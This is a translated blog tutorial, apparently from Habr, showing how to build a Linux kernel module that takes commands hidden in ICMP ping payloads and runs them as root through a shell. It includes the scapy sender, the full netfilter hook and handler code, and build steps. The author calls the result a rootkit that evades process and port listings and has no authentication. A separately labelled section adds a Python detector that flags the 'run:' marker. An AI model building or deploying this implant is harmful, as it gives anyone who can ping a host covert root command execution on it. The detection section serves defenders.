Kernel shell over ICMP

TL;DR: I'm writing a kernel module that reads commands from an ICMP payload and executes them on the server even when your SSH is broken. For the most impatient, all the code is on github.

Warning! Experienced C programmers risk weeping tears of blood! I may be sloppy with terminology, but any criticism is welcome. The post is intended for those who have only a very rough idea of C programming and want to look inside Linux.

In the comments to my first article, SoftEther VPN was mentioned, which can mimic some "ordinary" protocols, in particular HTTPS, ICMP and even DNS. I could only picture the first of these working, since I'm very familiar with HTTP(S), and I had to read up on ICMP and DNS tunneling.

Yes, in 2020 I learned that you can put an arbitrary payload inside ICMP packets. Better late than never! And since something can be done with this, it must be done. Since in everyday life I most often use the command line, including over SSH, the idea of an ICMP shell came to mind first. And to fill out a complete bullshit bingo card, I decided to write it as a Linux kernel module in a language of which I have only a vague idea. Such a shell won't show up in the process list; you can load it into the kernel and it won't be on the filesystem; you won't see anything suspicious in the list of listening ports. In terms of its capabilities this is a full-fledged rootkit, but I hope to improve it and use it as a last-resort shell for when the Load Average is too high to log in over SSH and run at least echo i > /proc/sysrq-trigger to restore access without a reboot.

We take a text editor, basic programming skills in Python and C, Google, and a virtual machine you don't mind putting under the knife if everything breaks (optional: VirtualBox/KVM/etc.), and off we go!

Client side

It seemed to me that for the client part I'd have to write a script of about 80 lines, but kind people had already done all the work for me. The code turned out to be unexpectedly simple, fitting into 10 meaningful lines:

import sys
from scapy.all import sr1, IP, ICMP

if len(sys.argv) < 3:
    print('Usage: {} IP "command"'.format(sys.argv[0]))
    exit(0)

p = sr1(IP(dst=sys.argv[1])/ICMP()/"run:{}".format(sys.argv[2]))
if p:
    p.show()

The script takes two arguments, an address and the payload. Before sending, the payload is prefixed with the key run:; we'll need it to filter out packets with random payloads.

The kernel needs privileges to craft packets, so the script has to be run as the superuser. Don't forget to grant execute permission and install scapy itself. Debian has a package called python3-scapy. Now you can check that it all works.

Running the command and its output
morq@laptop:~/icmpshell$ sudo ./send.py 45.11.26.232 "Hello, world!"
Begin emission:
.Finished sending 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 45
id = 17218
flags =
frag = 0
ttl = 58
proto = icmp
chksum = 0x3403
src = 45.11.26.232
dst = 192.168.0.240
options
###[ ICMP ]###
type = echo-reply
code = 0
chksum = 0xde03
id = 0x0
seq = 0x0
###[ Raw ]###
load = 'run:Hello, world!'

This is what it looks like to a sniffer
morq@laptop:~/icmpshell$ sudo tshark -i wlp1s0 -O icmp -f "icmp and host 45.11.26.232"
Running as user "root" and group "root". This could be dangerous.
Capturing on 'wlp1s0'
Frame 1: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 192.168.0.240, Dst: 45.11.26.232
Internet Control Message Protocol
Type: 8 (Echo (ping) request)
Code: 0
Checksum: 0xd603 [correct] [Checksum Status: Good]
Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

Frame 2: 59 bytes on wire (472 bits), 59 bytes captured (472 bits) on interface wlp1s0, id 0
Internet Protocol Version 4, Src: 45.11.26.232, Dst: 192.168.0.240
Internet Control Message Protocol
Type: 0 (Echo (ping) reply)
Code: 0
Checksum: 0xde03 [correct] [Checksum Status: Good] Identifier (BE): 0 (0x0000)
Identifier (LE): 0 (0x0000)
Sequence number (BE): 0 (0x0000)
Sequence number (LE): 0 (0x0000)
[Request frame: 1] [Response time: 19.094 ms]
Data (17 bytes)

0000 72 75 6e 3a 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 run:Hello, world
0010 21 !
Data: 72756e3a48656c6c6f2c20776f726c6421
[Length: 17]

^C2 packets captured

The payload inside the reply packet does not change.
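Because the reply carries the payload back unchanged, a network-side detector has to look at the echo request itself rather than at replies alone. The following is an added example, not code from the article or its repository: a small Python parser that decodes a raw IPv4/ICMP packet, verifies the ICMP checksum, and flags echo traffic whose data begins with the run: marker the article's client prepends. The packet bytes are constructed from the two frames in the tshark capture above (same addresses, types and data), plus one constructed ordinary ping for contrast; the build_ipv4_icmp helper, the verdict strings and the filler pattern of the benign ping are assumptions of this example.

```python
import socket
import struct

# Marker the article's client prepends to each command; used here as the detection signature.
RUN_MARKER = b"run:"


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit words, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_icmp(src, dst, icmp_type, data, ip_id=0, ttl=64):
    """Constructed test helper: raw IPv4 packet (no Ethernet header) carrying an ICMP echo message."""
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, 0, 0) + data  # id=0, seq=0 as in the capture
    icmp = icmp[:2] + struct.pack("!H", ones_complement_sum(icmp)) + icmp[4:]
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), ip_id, 0,
                      ttl, socket.IPPROTO_ICMP, 0,
                      socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ones_complement_sum(hdr)) + hdr[12:]
    return hdr + icmp


def parse_icmp_packet(pkt: bytes) -> dict:
    """Decode the IPv4 and ICMP headers and return the fields a detector cares about."""
    (ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _cks,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    if ver_ihl >> 4 != 4 or proto != socket.IPPROTO_ICMP:
        raise ValueError("not an IPv4/ICMP packet")
    ihl = (ver_ihl & 0x0F) * 4
    icmp = pkt[ihl:total_len]
    icmp_type, code, _checksum, ident, seq = struct.unpack("!BBHHH", icmp[:8])
    return {
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
        "type": icmp_type,
        "code": code,
        "id": ident,
        "seq": seq,
        # Summing the whole message, checksum field included, folds to 0 when it is valid.
        "checksum_ok": ones_complement_sum(icmp) == 0,
        "data": icmp[8:],
    }


def classify(pkt: bytes) -> str:
    """Verdict for one packet: malformed, suspicious-request, suspicious-reply or benign."""
    p = parse_icmp_packet(pkt)
    if not p["checksum_ok"]:
        return "malformed"
    if p["data"].startswith(RUN_MARKER):
        # The module only acts on echo requests; a reply carrying the marker means the
        # request reached a host that echoed it back unchanged.
        return "suspicious-request" if p["type"] == 8 else "suspicious-reply"
    return "benign"


def scan(packets):
    """Return (src, dst, verdict, command) for every packet that is not benign."""
    alerts = []
    for pkt in packets:
        verdict = classify(pkt)
        if verdict == "benign":
            continue
        p = parse_icmp_packet(pkt)
        cmd = p["data"][len(RUN_MARKER):] if verdict.startswith("suspicious") else b""
        alerts.append((p["src"], p["dst"], verdict, cmd))
    return alerts


# Constructed capture: the request and reply from the tshark output above, then an ordinary ping.
CAPTURE = [
    build_ipv4_icmp("192.168.0.240", "45.11.26.232", 8, b"run:Hello, world!"),
    build_ipv4_icmp("45.11.26.232", "192.168.0.240", 0, b"run:Hello, world!", ip_id=17218, ttl=58),
    build_ipv4_icmp("192.168.0.240", "45.11.26.232", 8, b"\x00" * 8 + bytes(range(16, 56))),
]

if __name__ == "__main__":
    for src, dst, verdict, cmd in scan(CAPTURE):
        print(f"{src} -> {dst}: {verdict} {cmd!r}")
```

The ICMP checksums the helper computes for the two constructed packets come out as 0xd603 and 0xde03, the same values tshark reported for the real frames, which is a useful sanity check that the bytes were rebuilt correctly. The marker match is deliberately exact: the article's module applies strncmp() on the first four bytes, so the signature is the same four bytes at offset 0 of the echo data.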

Kernel module

To build on a Debian machine you'll need at least make and linux-headers-amd64; everything else gets pulled in as dependencies. I won't reproduce all the code in the article; you can clone it from Github.

Setting up the hook

First we need two functions, to load the module and to unload it. The unload function isn't required, but then rmmod won't work; the module will only be unloaded at shutdown.

#include <linux/module.h>
#include <linux/netfilter_ipv4.h>

/* The hook function is defined further down; declare it so startup() can refer to it. */
static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state);

static struct nf_hook_ops nfho;

static int __init startup(void)
{
  nfho.hook = icmp_cmd_executor;
  nfho.hooknum = NF_INET_PRE_ROUTING;
  nfho.pf = PF_INET;
  nfho.priority = NF_IP_PRI_FIRST;
  /* Propagate the registration result so insmod fails if the hook could not be installed. */
  return nf_register_net_hook(&init_net, &nfho);
}

static void __exit cleanup(void)
{
  nf_unregister_net_hook(&init_net, &nfho);
}

MODULE_LICENSE("GPL");
module_init(startup);
module_exit(cleanup);

What happens here:

  1. Two header files are pulled in, for handling the module itself and for netfilter.
  2. All operations go through netfilter, and you can set hooks in it. To do this you need to declare a structure in which the hook will be configured. The most important thing is to specify the function that will be executed as the hook: nfho.hook = icmp_cmd_executor; I'll get to the function itself later.
    Then I set the moment at which the packet is processed: NF_INET_PRE_ROUTING means processing the packet as soon as it appears in the kernel. NF_INET_POST_ROUTING can be used to process the packet as it leaves the kernel.
    I set the filter to IPv4: nfho.pf = PF_INET;.
    I give my hook the highest priority: nfho.priority = NF_IP_PRI_FIRST;
    And I register the data structure as an actual hook: nf_register_net_hook(&init_net, &nfho);
  3. The last function removes the hook.
  4. The license is stated explicitly so that the compiler doesn't complain.
  5. The module_init() and module_exit() macros designate the other two functions as the module's initializer and destructor.

Retrieving the payload

Now we need to pull out the payload, and this was the hardest task. The kernel has no built-in functions for working with payloads; you can only parse the headers of the higher-level protocols.

#include <linux/ip.h>
#include <linux/icmp.h>
#include <linux/skbuff.h>
#include <linux/string.h>
#include <linux/workqueue.h>

#define MAX_CMD_LEN 1976

char cmd_string[MAX_CMD_LEN];

/* The handler is defined further down; declare it so DECLARE_WORK() can refer to it. */
static void work_handler(struct work_struct *work);

struct work_struct my_work;

DECLARE_WORK(my_work, work_handler);

static unsigned int icmp_cmd_executor(void *priv, struct sk_buff *skb, const struct nf_hook_state *state)
{
  struct iphdr *iph;
  struct icmphdr *icmph;

  unsigned char *user_data;
  unsigned char *tail;
  unsigned char *i;
  int j = 0;

  iph = ip_hdr(skb);
  icmph = icmp_hdr(skb);

  if (iph->protocol != IPPROTO_ICMP) {
    return NF_ACCEPT;
  }
  if (icmph->type != ICMP_ECHO) {
    return NF_ACCEPT;
  }

  /* The payload starts right after the ICMP header: sizeof(struct icmphdr), not
   * sizeof(icmph), which is the size of the pointer (the two coincide only on 64-bit). */
  user_data = (unsigned char *)icmph + sizeof(struct icmphdr);
  /* Only the linear part of the skb is walked; data held in pages is not visited. */
  tail = skb_tail_pointer(skb);

  j = 0;
  for (i = user_data; i < tail; ++i) {
    char c = *(char *)i;

    cmd_string[j] = c;
    j++;

    if (c == '\0')
      break;

    /* Out of room: terminate in the last slot instead of one past the array. */
    if (j == MAX_CMD_LEN - 1) {
      cmd_string[j] = '\0';
      break;
    }
  }
  /* The client sends no terminating NUL, so always terminate whatever was copied. */
  cmd_string[j] = '\0';

  if (strncmp(cmd_string, "run:", 4) != 0) {
    return NF_ACCEPT;
  } else {
    /* Drop the "run:" prefix by shifting the string left by four bytes. */
    for (j = 0; j < MAX_CMD_LEN - 4; j++) {
      cmd_string[j] = cmd_string[j+4];
      if (cmd_string[j] == '\0')
        break;
    }
  }

  schedule_work(&my_work);

  return NF_ACCEPT;
}

What happens:

  1. I had to include more header files, this time for handling the IP and ICMP headers.
  2. I set the maximum length of the string: #define MAX_CMD_LEN 1976. Why exactly that? Because the compiler complained about anything else! I've already been told that I need to learn about the stack and the heap; one day I'll do that and maybe even fix the code. Right away I define the string that will hold the command: char cmd_string[MAX_CMD_LEN];. It must be visible to all functions; I'll say more about this in point 9.
  3. Now we need to initialize a structure (struct work_struct my_work;) and associate it with some function (DECLARE_WORK(my_work, work_handler);). I'll also explain why this is needed in point 9.
  4. Now I declare the function that will be the hook. Its type and accepted arguments are dictated by netfilter; we're only interested in skb. This is the socket buffer, a fundamental data structure containing all the available information about the packet.
  5. For the function to work you'll need two structures and several variables, including two iterators.
      struct iphdr *iph;
      struct icmphdr *icmph;
    
      unsigned char *user_data;
      unsigned char *tail;
      unsigned char *i;
      int j = 0;
  6. Now the logic. For the module to work, no packets other than ICMP Echo are needed, so we parse the buffer with the built-in functions and discard all non-ICMP and non-Echo packets. Returning NF_ACCEPT means accepting the packet, but you can also drop packets by returning NF_DROP.
      iph = ip_hdr(skb);
      icmph = icmp_hdr(skb);
    
      if (iph->protocol != IPPROTO_ICMP) {
        return NF_ACCEPT;
      }
      if (icmph->type != ICMP_ECHO) {
        return NF_ACCEPT;
      }

    I haven't tried what happens without checking the IP header. My meager knowledge of C tells me that without additional checks something terrible is bound to happen. I'd be glad if you could prove me wrong!

  7. Now that the packet is of exactly the type we need, the data can be extracted. Without a built-in function you first have to obtain a pointer to the beginning of the payload. This is done in one place: take a pointer to the beginning of the ICMP header and advance it by the size of that header. Everything uses the icmph structure: user_data = (unsigned char *)icmph + sizeof(struct icmphdr);
    The end of the payload should coincide with the tail of the skb, so we get it the "kernel way" from the corresponding structure: tail = skb_tail_pointer(skb);.

    [Image: socket buffer layout, taken from an external source, where you can read more about the socket buffer.]

  8. Now that you have pointers to the beginning and the end, you can copy the data into the cmd_string string, check it for the run: prefix and either discard the packet if the prefix is missing, or rewrite the string, removing this prefix.
  9. That's it; now you can call another handler: schedule_work(&my_work);. Since no parameter can be passed in such a call, the string with the command has to be global. schedule_work() puts the function associated with the passed structure into the general task scheduler queue and returns, so you don't have to wait for the command to finish. This is necessary because the hook must be very fast. Otherwise your choice is that either nothing starts or you get a kernel panic. Delay is death!
  10. That's all; you can accept the packet with the corresponding return value.

Calling a program in user space

This function is the easiest to understand. Its name was given in DECLARE_WORK(); its type and accepted arguments are of no interest. We take the string with the command and pass it entirely to the shell. Let it deal with parsing, looking up binaries and everything else.

#include <linux/kmod.h>  /* call_usermodehelper() */

static void work_handler(struct work_struct * work)
{
  /* argv[2] points at the global cmd_string filled in by the hook. */
  static char *argv[] = {"/bin/sh", "-c", cmd_string, NULL};
  static char *envp[] = {"PATH=/bin:/sbin", NULL};

  call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
}

  1. Put the arguments into an array of strings, argv[]. I'll assume everyone knows that programs are actually run this way, not as one continuous line with spaces.
  2. Set the environment variables. I've included only PATH with a minimal set of paths, hoping that everyone has already merged /bin with /usr/bin and /sbin with /usr/sbin. Other paths rarely matter.
  3. Done, let's run it! The kernel function call_usermodehelper() takes as input the path to the binary, an array of arguments and an array of environment variables. Here I also assume that everyone understands why the path to the executable file is passed as a separate argument, but you can ask. The last argument specifies whether to wait for the process to finish (UMH_WAIT_PROC), for the process to start (UMH_WAIT_EXEC), or not to wait at all (UMH_NO_WAIT). There's also UMH_KILLABLE; I didn't look into it.

Build

Kernel modules are built with the kernel's make framework. make is called inside a special directory tied to the kernel version (defined here as KERNELDIR:=/lib/modules/$(shell uname -r)/build), and the location of the module is passed in the M variable in the arguments. The icmpshell.ko and clean targets use this framework entirely. obj-m specifies the object file that will be turned into a module. The syntax that turns main.o into icmpshell.o (icmpshell-objs = main.o) doesn't look very logical to me, but so be it.

KERNELDIR:=/lib/modules/$(shell uname -r)/build

obj-m = icmpshell.o
icmpshell-objs = main.o

all: icmpshell.ko

icmpshell.ko: main.c
	make -C $(KERNELDIR) M=$(PWD) modules

clean:
	make -C $(KERNELDIR) M=$(PWD) clean

Build: make. Install: insmod icmpshell.ko. Done, you can check: sudo ./send.py 45.11.26.232 "date > /tmp/test". If your machine now has the file /tmp/test and it contains the date at which the request was sent, you did everything right and so did I.

Conclusion

My first experience of kernel development turned out to be much easier than I expected. Even without any prior experience in C, guided by compiler hints and Google results, I was able to write a working module and feel like a kernel hacker, and at the same time a script kiddie. On top of that, I went to the Kernel Newbies channel, where I was told to use schedule_work() instead of calling call_usermodehelper() inside the hook itself, and was shamed for it, with a justified suspicion of a scam. A hundred lines of code cost me about a week of development in my free time. A successful experience that destroyed my personal myth about the overwhelming complexity of systems development.

If anyone is willing to do a code review on Github, I'd be grateful. I'm sure I made a lot of silly mistakes, especially when working with strings.

Source: www.habr.com
